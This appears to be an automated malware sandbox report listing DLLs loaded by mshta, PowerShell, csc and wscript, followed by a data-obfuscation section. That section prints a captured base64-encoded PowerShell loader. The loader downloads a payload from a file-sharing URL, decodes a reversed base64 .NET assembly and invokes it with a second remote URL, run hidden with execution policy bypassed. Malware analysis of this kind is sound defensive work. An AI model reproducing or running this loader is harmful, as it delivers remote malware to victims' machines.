        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb[ source: powershell.exe, 00000009.00000002.1834846594.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.pdb source: powershell.exe, 00000003.00000002.1798045854.0000000005027000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.1834462568.0000000007A52000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1834846594.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000009.00000002.1834462568.0000000007A52000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbx source: powershell.exe, 00000009.00000002.1824816604.00000000032F5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000009.00000002.1834462568.0000000007A52000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbL source: powershell.exe, 00000009.00000002.1824816604.00000000032F5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: CallSite.Target.pdbH source: powershell.exe, 00000009.00000002.1836478008.00000000087EF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: l\mscorlib.pdb source: powershell.exe, 00000009.00000002.1836478008.00000000087EF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbk source: powershell.exe, 00000009.00000002.1834462568.0000000007A52000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdb source: powershell.exe, 00000009.00000002.1834462568.0000000007A52000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load($marmorizar);$poetificar = [dnlib.IO.Home].GetMethod('VAI');$poetificar.Invoke($null, @('txt.VGFRE/3431/92.321.542.271//:ptth', '$desunificar', '$desunificar', '$desunificar', 'aspnet_
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull,
